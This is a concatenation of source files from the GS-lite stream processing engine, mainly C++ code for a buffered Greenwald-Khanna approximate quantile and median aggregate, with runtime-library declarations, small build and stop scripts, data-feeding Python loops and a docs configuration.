		nelts += t->gap;
	rank = (gs_int32_t) (phi*(float)nelts);
	p = vs->t;	// safe default so p is always a valid node
	for (t=vs->t; t != NULL; t=t->next) {
		rmin += t->gap;
		rmax = rmin+t->del;
		// Keep the node that minimizes the worst-case rank error.
		if (max(abs(rmin-rank), abs(rmax-rank)) < ropt) {
			p = t;
			ropt = max(abs(rmin-rank), abs(rmax-rank));
		}
	}
	return p->val;
}
/*
gs_uint32_t extr_quant_ui_hfta3_fcn(vstring *v, gs_float_t phi){
return extr_quant_hfta3_fcn<gs_uint32_t>(v, phi);
}
gs_int32_t extr_quant_i_hfta3_fcn(vstring *v, gs_float_t phi){
return extr_quant_hfta3_fcn<gs_int32_t>(v, phi);
}
gs_uint64_t extr_quant_ul_hfta3_fcn(vstring *v, gs_float_t phi){
return extr_quant_hfta3_fcn<gs_uint64_t>(v, phi);
}
gs_int64_t extr_quant_l_hfta3_fcn(vstring *v, gs_float_t phi){
return extr_quant_hfta3_fcn<gs_int64_t>(v, phi);
}
gs_float_t extr_quant_f_hfta3_fcn(vstring *v, gs_float_t phi){
return extr_quant_hfta3_fcn<gs_float_t>(v, phi);
}
*/
// Median extraction: the 0.5 quantile over the merged summary, plus the
// per-type non-template entry points.
template <class T> T extr_med_hfta3_fcn(vstring *v)
{
	return extr_quant_hfta3_fcn<T>(v, 0.5);
}
gs_uint32_t extr_ui_med_hfta3_fcn(vstring *v){
	return extr_med_hfta3_fcn<gs_uint32_t>(v);
}
gs_int32_t extr_i_med_hfta3_fcn(vstring *v){
	return extr_med_hfta3_fcn<gs_int32_t>(v);
}
gs_uint64_t extr_ul_med_hfta3_fcn(vstring *v){
	return extr_med_hfta3_fcn<gs_uint64_t>(v);
}
gs_int64_t extr_l_med_hfta3_fcn(vstring *v){
	return extr_med_hfta3_fcn<gs_int64_t>(v);
}
gs_float_t extr_f_med_hfta3_fcn(vstring *v){
	return extr_med_hfta3_fcn<gs_float_t>(v);
}
// Space diagnostic: number of supertuples held in the serialized summary.
template <class T> gs_uint32_t extr_quant_hfta3_space(vstring *v)
{
	quant_udaf_hfta_struct_t<T> *vs = (quant_udaf_hfta_struct_t<T> *)(v->offset);
	gs_uint32_t n = 0;
	supertuple3_t<T> *cur = vs->t;
	while (cur != NULL) {
		++n;
		cur = cur->next;
	}
	return n;
}
//////////////////////////////////////////////////////////////////////
// hfta-only code V3
// This approach stores values in a buffer until
// the buffer gets filled, and then puts the values into
// the approximate quantile udaf.
//
// Further, the code is templatized
#define MAX_QUANT_ELEMS 128
#define MAX_VAL_ELEMS 50
// MAX_VAL_ELEMS must be less than MAX_QUANT_ELEMS,
// and probably somewhat less than 1/QUANT_EPS
// Another consideration is space use, as most groups are small,
// so you want MAX_VAL_ELEMS to be as small as possible
// and still capture most small groups.
// To really optimize for space, use a doubling realloc
// strategy until the doubled size would be 2K bytes,
// and then instead of doubling, insert into the approx
// structure.
//
/*
template <class T> struct supertupleZ_t{
T val;
gs_uint32_t gap;
gs_uint32_t del;
gs_int32_t next;
};
*/
/*
template <class T> struct quant_udaf_hftaZ_struct_t{
gs_uint32_t nelts;
short int used_head;
short int free_head;
supertupleZ_t<T> *st;
gs_uint32_t *vals;
};
*/
// Compress the array-based (hftaZ) summary: merge each entry into its
// successor whenever their combined coverage stays under the GK threshold
// 2*eps*n, and return the freed slot to the free list.
template <class T> void quant_udaf_hftaZ_compress(quant_udaf_hfta_struct_t<T> *s)
{
	int t = s->used_head, d, d_next=-1;	// t trails d by one entry
	gs_uint32_t threshold;
	supertupleZ_t<T> *st = s->st;
	threshold = (gs_uint32_t)ceil((2.0 * QUANT_EPS) * (float)(s->nelts));
	// Fewer than two used entries: nothing to merge.
	if ((t == -1) || (st[t].next == -1)) return;
	d = st[t].next;
	while ((d != -1) && (st[d].next != -1)) {
		d_next = st[d].next;
		if (st[d].gap + st[d_next].gap + st[d_next].del < threshold) {
			// Fold d's count into its successor, unlink d, and recycle
			// its slot onto the free list.
			st[d_next].gap += st[d].gap;
			st[t].next = st[d].next;
			st[d].next = s->free_head;
			s->free_head = d;
		}
		t = st[t].next;
		d = st[t].next;
	}
}
// Start a new hftaZ aggregate.  Small groups buffer their raw values in
// s->vals; the switch to the approximate supertuple summary happens in
// the UPDATE function once MAX_VAL_ELEMS samples have arrived.
template <class T> void quant_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b) {
	quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
	//printf("quant_udaf_hftaZ_HFTA_AGGR_INIT_ size is %lu\n",sizeof(quant_udaf_hfta_struct_t<T>));
	s->nelts = 0;
	s->st=NULL;
	// NOTE(review): the buffer is sized by sizeof(T) but typed gs_uint32_t*,
	// so for 8-byte T it over-allocates while values stored through the
	// gs_uint32_t slots would be truncated -- confirm against the struct
	// definition before relying on 64-bit/float element types here.
	s->vals = (gs_uint32_t *)malloc(MAX_VAL_ELEMS*sizeof(T));
	s->t = NULL;
}
// Add one sample v to the hfta-only (version Z) quantile aggregate.
// Phase 1 buffers raw values exactly in s->vals; once MAX_VAL_ELEMS have
// arrived the state converts to a fixed-capacity GK supertuple array
// (s->st) with free-list slot management, and subsequent samples are
// inserted approximately.
// Fixes: the transition malloc sized slots by
// sizeof(quant_udaf_hfta_struct_t<T>) instead of sizeof(supertupleZ_t<T>),
// over-allocating each slot; removed a stray `cout << v` debug line that
// the sibling out-of-space branches do not have; dropped unused locals.
template <class T> void quant_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, T v) {
	quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
	// Exact phase: just append to the raw-value buffer.
	if(s->nelts<MAX_VAL_ELEMS){
		s->vals[s->nelts] = v;
		s->nelts++;
		return;
	}
	// Transition: sort the buffered values, seed the supertuple array with
	// them (gap=1, del=0), and chain the spare slots onto the free list.
	if(s->nelts==MAX_VAL_ELEMS){
		sort(s->vals,s->vals+s->nelts);
		// Each slot holds a supertupleZ_t<T> (was mis-sized by the
		// aggregate struct's size).
		s->st = (supertupleZ_t<T> *)malloc(MAX_QUANT_ELEMS*sizeof(supertupleZ_t<T>));
		for(int i=0;i<MAX_VAL_ELEMS;++i){
			s->st[i].val = s->vals[i];
			s->st[i].gap = 1;
			s->st[i].del = 0;
			s->st[i].next = i+1;
		}
		s->st[MAX_VAL_ELEMS-1].next = -1;
		for(int i=MAX_VAL_ELEMS; i<MAX_QUANT_ELEMS; ++i){
			s->st[i].next = i+1;
		}
		s->st[MAX_QUANT_ELEMS-1].next = -1;
		s->free_head = MAX_VAL_ELEMS;
		s->used_head = 0;
		free(s->vals);
		s->vals = NULL;
	}
	// Approximate phase (s->nelts > MAX_VAL_ELEMS): GK-style insert.
	int t=s->used_head;
	int newptr;
	gs_uint32_t threshold;
	gs_uint32_t obj;
	supertupleZ_t<T> *st = s->st;
	s->nelts++;
	// Left boundary: v is a new minimum (or the list is empty).
	if ((t==-1) || (v <= st[t].val)) {
		newptr = s->free_head;
		if (newptr==-1) {
			// No free slot: log, compress to make room next time, drop v.
			gslog(LOG_ALERT, "Out of space in quant_udaf_hftaZ_HFTA_AGGR_UPDATE_.\n");
			quant_udaf_hftaZ_compress<T>(s);
			return;
		}
		s->free_head = st[newptr].next;
		st[newptr].val = v;
		st[newptr].gap = 1;
		st[newptr].del = 0;
		st[newptr].next = s->used_head;
		s->used_head = newptr;
		return;
	}
	// Locate the pair of entries whose values sandwich v.
	int ptr=t;
	while ((st[ptr].next!=-1) && (st[st[ptr].next].val < v))
		ptr = st[ptr].next;
	// Right boundary: v is a new maximum, append at the tail.
	if (st[ptr].next==-1) {
		newptr = s->free_head;
		if (newptr==-1) {
			gslog(LOG_ALERT, "Out of space in quant_udaf_hftaZ_HFTA_AGGR_UPDATE_.\n");
			quant_udaf_hftaZ_compress<T>(s);
			return;
		}
		s->free_head = st[newptr].next;
		st[newptr].val = v;
		st[newptr].gap = 1;
		st[newptr].del = 0;
		st[newptr].next =-1;
		st[ptr].next = newptr;
	}
	// Interior insert: fold into the successor if the GK bound permits,
	// otherwise splice in a new supertuple.
	else {
		int nextptr = st[ptr].next;
		obj = st[ptr].gap + st[nextptr].gap + st[nextptr].del;
		threshold = (gs_uint32_t)ceil(2.0 * QUANT_EPS * (float)s->nelts);
		if (obj <= threshold) {
			// Absorb v into the existing bucket.
			st[nextptr].gap++;
		}
		else {
			newptr = s->free_head;
			if (newptr==-1) {
				gslog(LOG_ALERT, "Out of space in quant_udaf_hftaZ_HFTA_AGGR_UPDATE_.\n");
				quant_udaf_hftaZ_compress<T>(s);
				return;
			}
			s->free_head = st[newptr].next;
			st[newptr].val = v;
			st[newptr].gap = 1;
			st[newptr].del = st[nextptr].gap + st[nextptr].del-1;
			st[newptr].next = st[ptr].next;
			st[ptr].next = newptr;
		}
	}
	// Periodic compression keeps slot usage bounded.
	if(s->nelts>100 && (s->nelts & 0x03)==0)
		quant_udaf_hftaZ_compress<T>(s);
}
// Serialize the aggregate by handing out a shallow pointer to its state;
// the extraction functions below interpret the payload.
template <class T> void quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	r->length = sizeof(quant_udaf_hfta_struct_t<T>);
	r->offset = (gs_p_t )b;
	r->reserved = SHALLOW_COPY;
}
// Free whichever buffers this aggregate still owns (at most one of the
// raw-value buffer and the supertuple array is live at a time).
template <class T> void quant_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
	quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
	if (s->st != NULL)
		free(s->st);
	if (s->vals != NULL)
		free(s->vals);
}
// Extract the phi-quantile from a serialized hftaZ aggregate.  Three paths:
// a malloc'd hfta/lfta supertuple list (s->t), the exact raw-value buffer
// (s->vals), or the array-based supertuple summary (s->st).
template <class T> T extr_quant_hftaZ_fcn(vstring *v, gs_float_t phi) {
	quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)(v->offset);
	int t, p;
	if(s->t != NULL){ // separate path for hfta/lfta split
		return extr_quant_hfta3_fcn<T>(v, phi);
	}
	if(s->vals){
		// Few enough samples that all were kept: sort and index exactly.
		// NOTE(review): vals slots are gs_uint32_t, so non-32-bit T values
		// come back truncated here -- confirm against the struct definition.
		// qsort(s->vals, s->nelts, sizeof(gs_uint32_t), compare_gs_uint32);
		sort(s->vals,s->vals+s->nelts);
		gs_int32_t rank = (gs_int32_t) (phi*(float)(s->nelts));
		if(rank>=s->nelts)
			rank=s->nelts-1;	// clamp phi==1.0 to the last sample
		return s->vals[rank];
	}
	// Approximate path: pick the supertuple whose [rmin, rmax] rank
	// interval comes closest to the target rank.
	gs_int32_t rmin=0, rmax, rank, ropt=INT_MAX;
	gs_uint32_t count=0;
	supertupleZ_t<T> *st = s->st;
	rank = (gs_int32_t) (phi*(float)(s->nelts));
	for (t=s->used_head; t != -1; t=st[t].next) {
		rmin += st[t].gap;
		rmax = rmin+st[t].del;
		if (max(abs(rmin-rank), abs(rmax-rank)) < ropt) {
			p = t;
			ropt = max(abs(rmin-rank), abs(rmax-rank));
		} else break;	// error only grows past the optimum; stop early
	}
	return st[p].val;
}
// Median is the 0.5 quantile.
template <class T> T extr_med_hftaZ_fcn(vstring *v) {
	return extr_quant_hftaZ_fcn<T>(v, 0.5);
}
// Number of stored entries: the exact sample count while still buffering
// raw values, otherwise the length of the used supertuple chain.
template <class T> int quant_udaf_hftaZ_nelem(gs_sp_t b) {
	quant_udaf_hfta_struct_t<T> *s = (quant_udaf_hfta_struct_t<T> *)b;
	if (s->vals != NULL)
		return s->nelts;
	supertupleZ_t<T> *st = s->st;
	int n = 0;
	for (int cur = s->used_head; cur >= 0; cur = st[cur].next)
		n++;
	return n;
}
// ----------------------------------------------------------------------
// Non-template entry points for the hftaZ quantile UDAF: one complete set
// (init / update / output / destroy / quantile / median / nelem) per
// element type, each forwarding to the template instantiation.
// Unsigned int
void quant_ui_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b){
	quant_udaf_hftaZ_HFTA_AGGR_INIT_<gs_uint32_t>(b);
}
void quant_ui_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v){
	quant_udaf_hftaZ_HFTA_AGGR_UPDATE_<gs_uint32_t>(b,v);
}
void quant_ui_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_<gs_uint32_t>(r,b);
}
void quant_ui_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
	quant_udaf_hftaZ_HFTA_AGGR_DESTROY_<gs_uint32_t>(b);
}
gs_uint32_t extr_quant_ui_hftaZ_fcn(vstring *v, gs_float_t phi) {
	return extr_quant_hftaZ_fcn<gs_uint32_t>(v,phi);
}
gs_uint32_t extr_med_ui_hftaZ_fcn(vstring *v){
	return extr_med_hftaZ_fcn<gs_uint32_t>(v);
}
int quant_ui_udaf_hftaZ_nelem(gs_sp_t b) {
	return quant_udaf_hftaZ_nelem<gs_uint32_t>(b);
}
// int
void quant_i_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b){
	quant_udaf_hftaZ_HFTA_AGGR_INIT_<gs_int32_t>(b);
}
void quant_i_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_int32_t v){
	quant_udaf_hftaZ_HFTA_AGGR_UPDATE_<gs_int32_t>(b,v);
}
void quant_i_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_<gs_int32_t>(r,b);
}
void quant_i_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
	quant_udaf_hftaZ_HFTA_AGGR_DESTROY_<gs_int32_t>(b);
}
gs_int32_t extr_quant_i_hftaZ_fcn(vstring *v, gs_float_t phi) {
	return extr_quant_hftaZ_fcn<gs_int32_t>(v,phi);
}
gs_int32_t extr_med_i_hftaZ_fcn(vstring *v){
	return extr_med_hftaZ_fcn<gs_int32_t>(v);
}
gs_int32_t quant_i_udaf_hftaZ_nelem(gs_sp_t b) {
	return quant_udaf_hftaZ_nelem<gs_int32_t>(b);
}
// Unsigned long long int
void quant_ul_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b){
	quant_udaf_hftaZ_HFTA_AGGR_INIT_<gs_uint64_t>(b);
}
void quant_ul_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint64_t v){
	quant_udaf_hftaZ_HFTA_AGGR_UPDATE_<gs_uint64_t>(b,v);
}
void quant_ul_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_<gs_uint64_t>(r,b);
}
void quant_ul_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
	quant_udaf_hftaZ_HFTA_AGGR_DESTROY_<gs_uint64_t>(b);
}
gs_uint64_t extr_quant_ul_hftaZ_fcn(vstring *v, gs_float_t phi) {
	return extr_quant_hftaZ_fcn<gs_uint64_t>(v,phi);
}
gs_uint64_t extr_med_ul_hftaZ_fcn(vstring *v){
	return extr_med_hftaZ_fcn<gs_uint64_t>(v);
}
int quant_ul_udaf_hftaZ_nelem(gs_sp_t b) {
	return quant_udaf_hftaZ_nelem<gs_uint64_t>(b);
}
// long long int
void quant_l_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b){
	quant_udaf_hftaZ_HFTA_AGGR_INIT_<gs_int64_t>(b);
}
void quant_l_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_int64_t v){
	quant_udaf_hftaZ_HFTA_AGGR_UPDATE_<gs_int64_t>(b,v);
}
void quant_l_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_<gs_int64_t>(r,b);
}
void quant_l_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
	quant_udaf_hftaZ_HFTA_AGGR_DESTROY_<gs_int64_t>(b);
}
gs_int64_t extr_quant_l_hftaZ_fcn(vstring *v, gs_float_t phi) {
	return extr_quant_hftaZ_fcn<gs_int64_t>(v,phi);
}
gs_int64_t extr_med_l_hftaZ_fcn(vstring *v){
	return extr_med_hftaZ_fcn<gs_int64_t>(v);
}
int quant_l_udaf_hftaZ_nelem(gs_sp_t b) {
	return quant_udaf_hftaZ_nelem<gs_int64_t>(b);
}
// double
void quant_f_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b){
	quant_udaf_hftaZ_HFTA_AGGR_INIT_<gs_float_t>(b);
}
void quant_f_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_float_t v){
	quant_udaf_hftaZ_HFTA_AGGR_UPDATE_<gs_float_t>(b,v);
}
void quant_f_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) {
	quant_udaf_hftaZ_HFTA_AGGR_OUTPUT_<gs_float_t>(r,b);
}
void quant_f_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b){
	quant_udaf_hftaZ_HFTA_AGGR_DESTROY_<gs_float_t>(b);
}
gs_float_t extr_quant_f_hftaZ_fcn(vstring *v, gs_float_t phi) {
	return extr_quant_hftaZ_fcn<gs_float_t>(v,phi);
}
gs_float_t extr_med_f_hftaZ_fcn(vstring *v){
	return extr_med_hftaZ_fcn<gs_float_t>(v);
}
int quant_f_udaf_hftaZ_nelem(gs_sp_t b) {
	return quant_udaf_hftaZ_nelem<gs_float_t>(b);
}
<file_sep>import os
import time
while True:
while os.path.isfile("exampleGdat"):
time.sleep(1)
os.system("cp example.gdat exampleGdatX ; mv exampleGdatX exampleGdat")
time.sleep(1)
<file_sep>
/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include "errno.h"
#include "gsconfig.h"
#include "gshub.h"
#include "gstypes.h"
#include "lapp.h"
#include "fta.h"
#include "stdio.h"
#include "stdlib.h"
#include "packet.h"
#include "schemaparser.h"
#include "lfta/rts.h"
// --------------------------------------
// This is a stub entry point to ensure that proper linking.
// any actual rts_proto.c should be generated.
// --------------------------------------
// Entry for processing this interface
// Stub implementation only: a real rts_proto.c is generated at build time
// and must replace this, so reaching this body indicates a broken build
// or configuration.
gs_retval_t main_dproto(gs_int32_t devicenum, gs_sp_t device, gs_int32_t mapcnt, gs_sp_t map[]) {
	fprintf(stderr,"ERROR, empty main_dproto called.\n");
	exit(1);
}
<file_sep>.. This work is licensed under a Creative Commons Attribution 4.0 International License.
.. SPDX-License-Identifier: CC-BY-4.0
GS-lite Stream Processing Engine
=================================
.. toctree::
:maxdepth: 1
:caption: Documents:
overview.rst
release-notes.rst
* :ref:`search`
<file_sep>#!/bin/sh
./stopit
killall gsprintconsole
killall -9 gsprintconsole
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef __HFTA_RUNTIME_LIBRARY__
#define __HFTA_RUNTIME_LIBRARY__
#include "host_tuple.h"
#include "gsconfig.h"
#include "gstypes.h"
#define string_hash(s) hfta_vstr_hashfunc(s)
#define string_hash_long(s) hfta_vstr_long_hashfunc(s)
#define DNS_SAMPLE_HASH_SZ 50000000
#define DNS_HITLIST_HASH_SZ 50000000
#define DNS_HITLIST_ENTRY_SZ 500000
// Internal functions
void hfta_vstr_init(vstring * str);
gs_retval_t Vstring_Constructor(vstring *, gs_csp_t);
gs_retval_t hfta_vstr_length(vstring *);
void hfta_vstr_assign_with_copy_in_tuple(vstring32 *, const vstring *,
gs_sp_t, int);
void hfta_vstr_assign_with_copy(vstring *, const vstring *);
void hfta_vstr_destroy(vstring *);
void hfta_vstr_replace(vstring *, const vstring *);
gs_uint32_t hfta_vstr_hashfunc(const vstring *);
gs_uint64_t hfta_vstr_long_hashfunc(const vstring *);
gs_retval_t hfta_vstr_compare(const vstring *, const vstring *);
gs_retval_t hfta_vstr_equal(const vstring *, const vstring *);
gs_retval_t hfta_ipv6_compare(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2);
hfta_ipv6_str And_Ipv6(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2);
hfta_ipv6_str Or_Ipv6(const hfta_ipv6_str &i1, const hfta_ipv6_str &i2);
gs_uint32_t hfta_ipv6_hashfunc(const hfta_ipv6_str *s) ;
hfta_ipv6_str hton_ipv6(hfta_ipv6_str s);
hfta_ipv6_str ntoh_ipv6(hfta_ipv6_str s);
gs_retval_t HFTA_Ipv6_Constructor(hfta_ipv6_str *s, gs_csp_t l) ;
// External functions
// Shallow-copy the prefix of str into result, capping its length at
// `length` bytes; no string data is duplicated.
inline static gs_retval_t str_truncate(vstring * result, vstring *str, gs_uint32_t length) {
	result->offset = str->offset;
	if (str->length < length)
		result->length = str->length;
	else
		result->length = length;
	result->reserved = SHALLOW_COPY;
	return 0;
}
gs_retval_t str_suffix(vstring *result, vstring *s, gs_uint32_t n);
gs_retval_t get_list_entry(vstring *result, vstring *s, vstring *sep, gs_uint32_t pos);
gs_retval_t str_exists_substr(vstring * s1, vstring * s2);
gs_retval_t str_compare(vstring * s1, vstring * s2);
gs_retval_t str_equal(vstring * s1, vstring * s2);
gs_uint32_t str_match_offset(gs_uint32_t offset,vstring *s1,vstring *s2);
gs_uint32_t byte_match_offset( gs_uint32_t offset, gs_uint32_t val,vstring *s2);
// REGEX functions
gs_retval_t str_regex_match(vstring* str, gs_param_handle_t pattern_handle);
gs_param_handle_t register_handle_for_str_regex_match_slot_1(vstring* pattern);
gs_retval_t deregister_handle_for_str_regex_match_slot_1(gs_param_handle_t handle);
gs_retval_t str_partial_regex_match(vstring* str, gs_param_handle_t pattern_handle);
gs_param_handle_t register_handle_for_str_partial_regex_match_slot_1(vstring* pattern);
gs_retval_t deregister_handle_for_str_partial_regex_match_slot_1(gs_param_handle_t handle);
gs_param_handle_t register_handle_for_str_extract_regex_slot_1(vstring* pattern);
gs_retval_t str_extract_regex( vstring * result, vstring * str, gs_param_handle_t handle);
gs_retval_t deregister_handle_for_str_extract_regex_slot_1(gs_param_handle_t handle);
// type conversion
// Avoid redefinition from rts_udaf.h
#ifndef INT
#define INT(c) ((int)(c))
#define UINT(c) ((gs_uint32_t)(c))
#define FLOAT(c) ((gs_float_t)(c))
#define LLONG(c) ((long long int)(c))
#define ULLONG(c) ((gs_uint64_t)(c))
#endif
// string conversions
gs_uint32_t strtoi(gs_uint32_t * r, struct vstring *data);
gs_uint32_t strtoip(gs_uint32_t * r, struct vstring *data);
// constant string conversions
// Avoid redefinition from rts_udaf.h
#ifndef strtoi_c
#define strtoi_c(h) ((gs_uint32_t)(h))
#define strtoip_c(h) ((gs_uint32_t)(h))
#endif
gs_param_handle_t register_handle_for_strtoi_c_slot_0(vstring* istr) ;
gs_retval_t deregister_handle_for_strtoi_c_slot_0(gs_param_handle_t h) ;
gs_param_handle_t register_handle_for_strtoip_c_slot_0(vstring* istr) ;
gs_retval_t deregister_handle_for_strtoip_c_slot_0(gs_param_handle_t h) ;
// Return 1 iff s1 occurs in s2 starting exactly at byte position `offset`,
// 0 otherwise (including when s2 is too short for a full match).
inline gs_uint32_t str_match_offset( gs_uint32_t offset, struct vstring * s1, struct vstring * s2) {
	const gs_uint8_t *pat = (const gs_uint8_t *) s1->offset;
	const gs_uint8_t *txt = (const gs_uint8_t *) (s2->offset + offset);
	gs_int32_t patlen = s1->length;
	gs_int32_t remaining = s2->length - offset;
	if (remaining < patlen)
		return 0;
	gs_int32_t i = 0;
	while (i < patlen) {
		if (pat[i] != txt[i])
			return 0;
		i++;
	}
	return 1;
}
// -------------------------------------------------------
// map_int_to_string and its support functions, structs
gs_param_handle_t register_handle_for_int_to_string_map_slot_1(vstring *filename);
gs_retval_t int_to_string_map(vstring *result, gs_int64_t val, gs_param_handle_t handle);
gs_param_handle_t deregister_handle_for_int_to_string_map_slot_1(gs_param_handle_t handle);
// --------------------------------------------------
// to_hex_string, for printing a binary string
gs_retval_t to_hex_string(vstring *result, vstring *val);
// ------------------------------------------------------
// sum up unsigned integers expressed as a string with separators,
// e.g. on input '34|45|56' and sep '|', return 135.
// This kind of thing is common in Nokia PCMD data.
// gracefully handle empty entries, e.g. '|8|' should return 8
gs_int64_t sum_uint_in_list(struct vstring *list, struct vstring *sepchar);
// --------------------------------------------
// Convert an string to an integer
gs_int64_t to_llong(vstring *v);
#endif
<file_sep>import os
import time
while True:
while os.path.isfile("exampleCsv"):
time.sleep(1)
os.system("cp example.data exampleCsvX ; mv exampleCsvX exampleCsv")
time.sleep(1)
<file_sep>#!/bin/sh
# ------------------------------------------------
# Copyright 2014 AT&T Intellectual Property
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------
# GSLITE_ROOT environment variable need to be set
if [ -z "$GSLITE_ROOT" ]
then
echo "GSLITE_ROOT must be set to non-empty string"
exit -1
fi
$GSLITE_ROOT/bin/translate_fta -f -N -h localhost -c -M -R $GSLITE_ROOT -C $GSLITE_ROOT/cfg -l $GSLITE_ROOT/qlib packet_schema.txt *.gsql
ret=$?
if [ $ret -ne 0 ]
then
echo "Query translation failed!"
exit $ret
fi
make
ret=$?
if [ $ret -ne 0 ]
then
echo "Query build failed!"
exit $ret
fi
exit $ret
<file_sep>#==================================================================================
# Copyright (c) 2018-2019 AT&T Intellectual Property.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#==================================================================================
[tox]
minversion = 2.0
envlist =
docs,
docs-linkcheck,
skipsdist = true
[testenv:docs]
basepython = python3
deps =
sphinx
sphinx-rtd-theme
sphinxcontrib-httpdomain
recommonmark
lfdocs-conf
commands =
sphinx-build -W -b html -n -d {envtmpdir}/doctrees ./docs/ {toxinidir}/docs/_build/html
echo "Generated docs available in {toxinidir}/docs/_build/html"
whitelist_externals = echo
[testenv:docs-linkcheck]
basepython = python3
deps = sphinx
sphinx-rtd-theme
sphinxcontrib-httpdomain
recommonmark
lfdocs-conf
commands = sphinx-build -W -b linkcheck -d {envtmpdir}/doctrees ./docs/ {toxinidir}/docs/_build/linkcheck
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <schemaparser.h>
#include "gsconfig.h"
#include "gstypes.h"
#include <math.h>
FILE * ifd;
FILE * ofd;
FILE * sfd;
#define MAX_GDAT_HEADER 10000
gs_int8_t buf[2*MAXTUPLESZ];
gs_int8_t schema_buf[MAX_GDAT_HEADER];
gs_int8_t header_buf[MAX_GDAT_HEADER];
/* Read one length-prefixed tuple from the global input stream ifd into
 * data (at most maxlen bytes); *sz receives the host-order tuple length.
 * Zero-length records are skipped; EOF terminates the whole program. */
gs_retval_t read_tuple(gs_uint32_t * sz, gs_sp_t data, gs_int32_t maxlen) {
	gs_uint32_t nsz;
	static gs_uint32_t read=0;	/* running byte count (diagnostic only) */
again:
	if (fread(&nsz,sizeof(gs_uint32_t),1,ifd)!=1) {
		exit(0);	/* clean EOF: no more tuples */
	}
	read=read+sizeof(gs_uint32_t);
	*sz=ntohl(nsz);	/* length prefix is stored in network byte order */
	if ((*sz)>maxlen) {
		fprintf(stderr,"INTERNAL ERROR tuple to long for fixed buffer. Tuple sz %u\n",
			(*sz));
		*sz=0;
		return 0;
	}
	if (*sz==0) goto again;	/* skip empty records */
	if (fread(data,(*sz),1,ifd)!=1) {
		fprintf(stderr,"UNEXPECTED END OF FILE. Tried to read tuple of size %u\n",
			(*sz));
		exit(0);
	}
	read=read+*sz;
	return 0;
}
